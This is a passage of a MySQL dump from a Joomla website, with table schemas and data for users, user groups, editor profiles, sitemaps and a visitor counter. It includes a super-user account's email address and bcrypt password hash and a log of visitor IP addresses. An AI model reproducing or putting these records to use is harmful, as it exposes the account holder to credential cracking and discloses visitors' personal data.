package','','pkg_akeeba','package','',0,'8.2.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-2-7.html',''),(34752,1,0,'Joomla','','joomla','file','',0,'3.10.11','','https://update.joomla.org/core/extension.xml','','');
/*!40000 ALTER TABLE `fw3gt_updates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_user_keys`
--

DROP TABLE IF EXISTS `fw3gt_user_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_user_keys` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL,
  `token` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `series` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `invalid` tinyint(4) NOT NULL,
  `time` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `uastring` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `series` (`series`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_user_keys`
--

LOCK TABLES `fw3gt_user_keys` WRITE;
/*!40000 ALTER TABLE `fw3gt_user_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_user_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_user_notes`
--

DROP TABLE IF EXISTS `fw3gt_user_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_user_notes` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `subject` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `body` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int(10) unsigned NOT NULL,
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `review_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`),
  KEY `idx_category_id` (`catid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_user_notes`
--

LOCK TABLES `fw3gt_user_notes` WRITE;
/*!40000 ALTER TABLE `fw3gt_user_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_user_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_user_profiles`
--

DROP TABLE IF EXISTS `fw3gt_user_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_user_profiles` (
  `user_id` int(11) NOT NULL,
  `profile_key` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `profile_value` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Simple user profile storage table';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_user_profiles`
--

LOCK TABLES `fw3gt_user_profiles` WRITE;
/*!40000 ALTER TABLE `fw3gt_user_profiles` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_user_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_user_usergroup_map`
--

DROP TABLE IF EXISTS `fw3gt_user_usergroup_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_user_usergroup_map` (
  `user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__users.id',
  `group_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__usergroups.id',
  PRIMARY KEY (`user_id`,`group_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_user_usergroup_map`
--

LOCK TABLES `fw3gt_user_usergroup_map` WRITE;
/*!40000 ALTER TABLE `fw3gt_user_usergroup_map` DISABLE KEYS */;
INSERT INTO `fw3gt_user_usergroup_map` VALUES (430,8);
/*!40000 ALTER TABLE `fw3gt_user_usergroup_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_usergroups`
--

DROP TABLE IF EXISTS `fw3gt_usergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_usergroups` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Adjacency List Reference Id',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`),
  KEY `idx_usergroup_title_lookup` (`title`),
  KEY `idx_usergroup_adjacency_lookup` (`parent_id`),
  KEY `idx_usergroup_nested_set_lookup` (`lft`,`rgt`)
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_usergroups`
--

LOCK TABLES `fw3gt_usergroups` WRITE;
/*!40000 ALTER TABLE `fw3gt_usergroups` DISABLE KEYS */;
INSERT INTO `fw3gt_usergroups` VALUES (1,0,1,20,'Public'),(2,1,6,17,'Registered'),(3,2,7,14,'Author'),(4,3,8,11,'Editor'),(5,4,9,10,'Publisher'),(6,1,2,5,'Manager'),(7,6,3,4,'Administrator'),(8,1,18,19,'Super Users');
/*!40000 ALTER TABLE `fw3gt_usergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_users`
--

DROP TABLE IF EXISTS `fw3gt_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `username` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `password` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `block` tinyint(4) NOT NULL DEFAULT '0',
  `sendEmail` tinyint(4) DEFAULT '0',
  `registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `activation` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `lastResetTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Date of last password reset',
  `resetCount` int(11) NOT NULL DEFAULT '0' COMMENT 'Count of password resets since lastResetTime',
  `otpKey` varchar(1000) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Two factor authentication encrypted keys',
  `otep` varchar(1000) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'One time emergency passwords',
  `requireReset` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Require user to reset password on next login',
  PRIMARY KEY (`id`),
  KEY `idx_block` (`block`),
  KEY `username` (`username`),
  KEY `email` (`email`),
  KEY `idx_name` (`name`(100))
) ENGINE=InnoDB AUTO_INCREMENT=431 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_users`
--

LOCK TABLES `fw3gt_users` WRITE;
/*!40000 ALTER TABLE `fw3gt_users` DISABLE KEYS */;
INSERT INTO `fw3gt_users` VALUES (430,'Super User','sugelamadmin','malehus@ukr.net','$2y$10$Fi4HpQQQd/rTwml32h0./eP2YitcrUpP3XhJ1jAkCvsQJMy4N.l8O',0,1,'2014-09-16 08:36:58','2023-01-22 09:44:08','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);
/*!40000 ALTER TABLE `fw3gt_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_utf8_conversion`
--

DROP TABLE IF EXISTS `fw3gt_utf8_conversion`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_utf8_conversion` (
  `converted` tinyint(4) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_utf8_conversion`
--

LOCK TABLES `fw3gt_utf8_conversion` WRITE;
/*!40000 ALTER TABLE `fw3gt_utf8_conversion` DISABLE KEYS */;
INSERT INTO `fw3gt_utf8_conversion` VALUES (2);
/*!40000 ALTER TABLE `fw3gt_utf8_conversion` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_viewlevels`
--

DROP TABLE IF EXISTS `fw3gt_viewlevels`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_viewlevels` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rules` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded access control.',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_assetgroup_title_lookup` (`title`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_viewlevels`
--

LOCK TABLES `fw3gt_viewlevels` WRITE;
/*!40000 ALTER TABLE `fw3gt_viewlevels` DISABLE KEYS */;
INSERT INTO `fw3gt_viewlevels` VALUES (1,'Public',0,'[1]'),(2,'Registered',1,'[6,2,8]'),(3,'Special',2,'[6,3,8]');
/*!40000 ALTER TABLE `fw3gt_viewlevels` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_weblinks`
--

DROP TABLE IF EXISTS `fw3gt_weblinks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_weblinks` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `url` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `hits` int(11) NOT NULL DEFAULT '0',
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '1',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadata` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if link is featured.',
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `images` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_weblinks`
--

LOCK TABLES `fw3gt_weblinks` WRITE;
/*!40000 ALTER TABLE `fw3gt_weblinks` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_weblinks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_wf_profiles`
--

DROP TABLE IF EXISTS `fw3gt_wf_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_wf_profiles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `description` text NOT NULL,
  `users` text NOT NULL,
  `types` text NOT NULL,
  `components` text NOT NULL,
  `area` tinyint(3) NOT NULL,
  `device` varchar(255) NOT NULL,
  `rows` text NOT NULL,
  `plugins` text NOT NULL,
  `published` tinyint(3) NOT NULL,
  `ordering` int(11) NOT NULL,
  `checked_out` tinyint(3) NOT NULL,
  `checked_out_time` datetime NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_wf_profiles`
--

LOCK TABLES `fw3gt_wf_profiles` WRITE;
/*!40000 ALTER TABLE `fw3gt_wf_profiles` DISABLE KEYS */;
INSERT INTO `fw3gt_wf_profiles` VALUES (1,'Default','Default Profile for all users','','3,4,5,6,8,7','',0,'desktop,tablet,phone','help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,blockquote,formatselect,styleselect,removeformat,cleanup;fontselect,fontsizeselect,forecolor,backcolor,spacer,clipboard,indent,outdent,lists,sub,sup,textcase,charmap,hr;directionality,fullscreen,preview,source,print,searchreplace,spacer,table;visualaid,visualchars,visualblocks,nonbreaking,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article,caption,emotions,filemanager,imgmap,imgmanager_ext,microdata,templatemanager','charmap,contextmenu,browser,inlinepopups,media,help,clipboard,searchreplace,directionality,fullscreen,preview,source,table,textcase,print,style,nonbreaking,visualchars,visualblocks,xhtmlxtras,imgmanager,anchor,link,spellchecker,article,lists,formatselect,styleselect,fontselect,fontsizeselect,fontcolor,formatselect,styleselect,fontselect,fontsizeselect,fontcolor,formatselect,styleselect,fontselect,fontsizeselect,fontcolor,caption,emotions,filemanager,imgmap,imgmanager_ext,microdata,templatemanager,hr,hr',1,0,0,'0000-00-00 00:00:00','{\"editor\":{\"toolbar_theme\":\"default\"}}'),(2,'Front End','Sample Front-end Profile','','3,4,5','',1,'desktop,tablet,phone','help,newdocument,undo,redo,spacer,bold,italic,underline,strikethrough,justifyfull,justifycenter,justifyleft,justifyright,spacer,formatselect,styleselect;clipboard,searchreplace,indent,outdent,lists,cleanup,charmap,removeformat,hr,sub,sup,textcase,nonbreaking,visualchars,visualblocks;fullscreen,preview,print,visualaid,style,xhtmlxtras,anchor,unlink,link,imgmanager,spellchecker,article','charmap,contextmenu,inlinepopups,help,clipboard,searchreplace,fullscreen,preview,print,style,textcase,nonbreaking,visualchars,visualblocks,xhtmlxtras,imgmanager,anchor,link,spellchecker,article,lists,formatselect,styleselect,formatselect,styleselect,formatselect,styleselect,hr,hr',1,2,0,'0000-00-00 00:00:00','{\"editor\":{\"toolbar_theme\":\"default\"}}'),(3,'Blogger','Simple Blogging Profile','','1,6,7,2,3,4,5,8','',0,'desktop,tablet,phone','bold,italic,strikethrough,lists,blockquote,spacer,justifyleft,justifycenter,justifyright,spacer,link,unlink,imgmanager,article,spellchecker,fullscreen,kitchensink;formatselect,styleselect,underline,justifyfull,clipboard,removeformat,charmap,indent,outdent,undo,redo,help','link,imgmanager,article,spellchecker,fullscreen,kitchensink,clipboard,contextmenu,inlinepopups,lists,formatselect,styleselect,formatselect,styleselect,formatselect,styleselect,hr,hr',1,0,0,'0000-00-00 00:00:00','{\"editor\":{\"toggle\":\"0\",\"width\":\"\",\"height\":\"\",\"toolbar_theme\":\"default\",\"toolbar_align\":\"left\",\"toolbar_location\":\"top\",\"statusbar_location\":\"bottom\",\"path\":\"1\",\"resizing\":\"1\",\"resize_horizontal\":\"1\",\"resizing_use_cookie\":\"1\",\"toggle_label\":\"[Toggle Editor]\",\"toggle_state\":\"1\",\"relative_urls\":\"1\",\"verify_html\":\"\",\"schema\":\"\",\"forced_root_block\":\"\",\"profile_content_css\":\"2\",\"profile_content_css_custom\":\"\",\"custom_colors\":\"\",\"dir\":\"\",\"filesystem\":{\"name\":\"joomla\",\"joomla\":{\"allow_root\":\"0\",\"restrict_dir\":\"administrator,cache,components,includes,language,libraries,logs,media,modules,plugins,templates,xmlrpc\"}},\"max_size\":\"\",\"upload_conflict\":\"overwrite\",\"upload_runtimes\":[\"html5\",\"flash\",\"silverlight\",\"html4\"],\"browser_position\":\"bottom\",\"folder_tree\":\"1\",\"list_limit\":\"all\",\"validate_mimetype\":\"1\",\"websafe_mode\":\"utf-8\",\"websafe_allow_spaces\":\"0\",\"websafe_textcase\":[\"uppercase\",\"lowercase\"],\"upload_add_random\":\"0\",\"date_format\":\"\",\"invalid_elements\":\"\",\"invalid_attributes\":\"dynsrc,lowsrc\",\"invalid_attribute_values\":\"\",\"extended_elements\":\"\",\"allow_javascript\":\"0\",\"allow_css\":\"0\",\"allow_php\":\"0\",\"cdata\":\"1\"},\"link\":{\"target\":\"\",\"id\":\"\",\"style\":\"\",\"classes\":\"\",\"dir\":\"\",\"hreflang\":\"\",\"lang\":\"\",\"charset\":\"\",\"type\":\"\",\"rel\":\"\",\"rev\":\"\",\"tabindex\":\"\",\"accesskey\":\"\",\"file_browser\":\"1\",\"tabs_advanced\":\"1\",\"attributes_anchor\":\"1\",\"attributes_target\":\"1\",\"links\":{\"joomlalinks\":{\"enable\":\"1\",\"content\":\"1\",\"article_alias\":\"1\",\"static\":\"1\",\"contacts\":\"1\",\"weblinks\":\"1\",\"weblinks_alias\":\"1\",\"menu\":\"1\"},\"k2links\":{\"enable\":\"1\",\"k2\":\"1\",\"tags\":\"1\"}},\"popups\":{\"default\":\"\",\"jcemediabox\":{\"enable\":\"1\",\"attribute\":\"data-mediabox\",\"popup_group\":\"\",\"popup_icon\":\"1\",\"popup_icon_position\":\"\",\"popup_autopopup\":\"\",\"popup_hide\":\"0\",\"popup_mediatype\":\"\"},\"window\":{\"enable\":\"1\"}},\"search\":{\"link\":{\"enable\":\"1\",\"plugins\":[\"categories\",\"contacts\",\"content\",\"newsfeeds\",\"weblinks\"]}}},\"imgmanager\":{\"dir\":\"\",\"max_size\":\"\",\"extensions\":\"image=jpeg,jpg,png,gif\",\"filesystem\":{\"name\":\"\"},\"alt\":\"\",\"margin_top\":\"\",\"margin_right\":\"\",\"margin_bottom\":\"\",\"margin_left\":\"\",\"border\":\"0\",\"border_width\":\"1\",\"border_style\":\"solid\",\"border_color\":\"#000000\",\"align\":\"\",\"always_include_dimensions\":\"0\",\"style\":\"\",\"classes\":\"\",\"title\":\"\",\"id\":\"\",\"direction\":\"\",\"usemap\":\"\",\"longdesc\":\"\",\"tabs_rollover\":\"1\",\"tabs_advanced\":\"1\",\"attributes_dimensions\":\"1\",\"attributes_align\":\"1\",\"attributes_margin\":\"1\",\"attributes_border\":\"1\",\"upload\":\"1\",\"folder_new\":\"1\",\"folder_delete\":\"1\",\"folder_rename\":\"1\",\"folder_move\":\"1\",\"file_delete\":\"1\",\"file_rename\":\"1\",\"file_move\":\"1\",\"inline_upload\":\"1\"},\"article\":{\"buttons\":[\"readmore\",\"pagebreak\"]},\"spellchecker\":{\"engine\":\"browser\",\"browser_state\":\"0\",\"suggestions\":\"1\",\"languages\":\"English=en\",\"pspell_mode\":\"PSPELL_FAST\",\"pspell_spelling\":\"\",\"pspell_jargon\":\"\",\"pspell_encoding\":\"\",\"pspell_dictionary\":\"components\\/com_jce\\/editor\\/tiny_mce\\/plugins\\/spellchecker\\/dictionary.pws\",\"pspellshell_aspell\":\"\\/usr\\/bin\\/aspell\",\"pspellshell_tmp\":\"\\/tmp\"},\"clipboard\":{\"paste_use_dialog\":\"0\",\"paste_dialog_width\":\"450\",\"paste_dialog_height\":\"400\",\"paste_force_cleanup\":\"0\",\"paste_strip_class_attributes\":\"0\",\"paste_remove_spans\":\"0\",\"paste_remove_styles\":\"0\",\"paste_remove_tags\":\"\",\"paste_keep_tags\":\"\",\"paste_remove_attributes\":\"\",\"paste_retain_style_properties\":\"\",\"paste_remove_empty_paragraphs\":\"1\",\"paste_remove_styles_if_webkit\":\"0\",\"paste_process_footnotes\":\"convert\",\"paste_upload_images\":\"0\",\"paste_filter\":\"\",\"paste_html\":\"1\",\"paste_text\":\"1\",\"buttons\":[\"cut\",\"copy\",\"paste\",\"pastetext\"]},\"lists\":{\"number_styles\":[\"default\",\"lower-alpha\",\"lower-greek\",\"lower-roman\",\"upper-alpha\",\"upper-roman\"],\"bullet_styles\":[\"default\",\"circle\",\"disc\",\"square\"],\"buttons\":[\"numlist\",\"bullist\"]},\"formatselect\":{\"blockformats\":\"\"},\"styleselect\":{\"styles\":[\"stylesheet\",\"custom\"],\"custom_styles\":\"\"}}'),(4,'Mobile','Sample Mobile Profile','','3,4,5,6,8,7','',0,'tablet,phone','undo,redo,spacer,bold,italic,underline,formatselect,spacer,justifyleft,justifycenter,justifyfull,justifyright,spacer,fullscreen,kitchensink;styleselect,lists,spellchecker,article,link,unlink','fullscreen,kitchensink,spellchecker,article,link,inlinepopups,lists,formatselect,styleselect,formatselect,styleselect,formatselect,styleselect',0,4,0,'0000-00-00 00:00:00','{\"editor\":{\"toolbar_theme\":\"mobile\",\"resizing\":\"0\",\"resize_horizontal\":\"0\",\"resizing_use_cookie\":\"0\",\"toggle\":\"0\",\"links\":{\"popups\":{\"default\":\"\",\"jcemediabox\":{\"enable\":\"0\"},\"window\":{\"enable\":\"0\"}}}}}');
/*!40000 ALTER TABLE `fw3gt_wf_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_xmap_items`
--

DROP TABLE IF EXISTS `fw3gt_xmap_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_xmap_items` (
  `uid` varchar(100) NOT NULL,
  `itemid` int(11) NOT NULL,
  `view` varchar(10) NOT NULL,
  `sitemap_id` int(11) NOT NULL,
  `properties` varchar(300) DEFAULT NULL,
  PRIMARY KEY (`uid`,`itemid`,`view`,`sitemap_id`),
  KEY `uid` (`uid`,`itemid`),
  KEY `view` (`view`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_xmap_items`
--

LOCK TABLES `fw3gt_xmap_items` WRITE;
/*!40000 ALTER TABLE `fw3gt_xmap_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_xmap_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_xmap_sitemap`
--

DROP TABLE IF EXISTS `fw3gt_xmap_sitemap`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_xmap_sitemap` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) DEFAULT NULL,
  `alias` varchar(255) DEFAULT NULL,
  `introtext` text,
  `metadesc` text,
  `metakey` text,
  `attribs` text,
  `selections` text,
  `excluded_items` text,
  `is_default` int(1) DEFAULT '0',
  `state` int(2) DEFAULT NULL,
  `access` int(11) DEFAULT NULL,
  `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `count_xml` int(11) DEFAULT NULL,
  `count_html` int(11) DEFAULT NULL,
  `views_xml` int(11) DEFAULT NULL,
  `views_html` int(11) DEFAULT NULL,
  `lastvisit_xml` int(11) DEFAULT NULL,
  `lastvisit_html` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_xmap_sitemap`
--

LOCK TABLES `fw3gt_xmap_sitemap` WRITE;
/*!40000 ALTER TABLE `fw3gt_xmap_sitemap` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_xmap_sitemap` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_zt_visitor_counter`
--

DROP TABLE IF EXISTS `fw3gt_zt_visitor_counter`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_zt_visitor_counter` (
  `id` int(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` int(10) unsigned NOT NULL,
  `visits` int(8) unsigned NOT NULL DEFAULT '0',
  `guests` int(8) unsigned NOT NULL DEFAULT '0',
  `bots` int(8) unsigned NOT NULL DEFAULT '0',
  `members` int(8) unsigned NOT NULL DEFAULT '0',
  `ipaddress` varchar(150) DEFAULT NULL,
  `useragent` varchar(120) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `timestamp` (`timestamp`)
) ENGINE=InnoDB AUTO_INCREMENT=568051 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_zt_visitor_counter`
--

LOCK TABLES `fw3gt_zt_visitor_counter` WRITE;
/*!40000 ALTER TABLE `fw3gt_zt_visitor_counter` DISABLE KEYS */;
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (1,1454778788,1,0,1,0,'66.249.78.158',''),(2,1454778821,1,1,0,0,'37.54.114.56','firefox'),(3,1454778879,1,1,0,0,'5.255.253.99','other'),(4,1454778980,1,1,0,0,'66.249.81.211','other'),(5,1454779002,1,0,1,0,'66.249.78.151',''),(6,1454779492,1,0,1,0,'68.180.229.232',''),(7,1454779985,1,1,0,0,'217.69.143.47','other'),(8,1454780263,1,1,0,0,'217.69.143.53','other'),(9,1454780264,1,1,0,0,'217.69.143.61','other'),(10,1454780336,8,8,0,0,'5.255.253.95','other'),(11,1454780338,5,5,0,0,'5.255.253.99','other'),(12,1454780637,4,4,0,0,'141.8.132.10','other'),(13,1454780645,4,4,0,0,'178.154.189.17','other'),(14,1454780654,5,5,0,0,'141.8.184.18','other'),(15,1454780751,1,0,1,0,'66.249.78.158',''),(16,1454781059,1,1,0,0,'37.54.114.56','firefox'),(17,1454781065,1,0,1,0,'66.249.78.151',''),(18,1454781604,1,0,1,0,'68.180.229.232',''),(19,1454781873,1,0,1,0,'66.249.66.150',''),(20,1454782166,1,1,0,0,'213.174.7.20','chrome'),(21,1454782574,1,1,0,0,'213.174.7.30','chrome'),(22,1454782602,1,1,0,0,'66.249.81.208','other'),(23,1454782951,1,1,0,0,'180.76.15.28','other'),(24,1454783070,1,1,0,0,'5.255.253.95','other'),(25,1454783072,1,1,0,0,'130.193.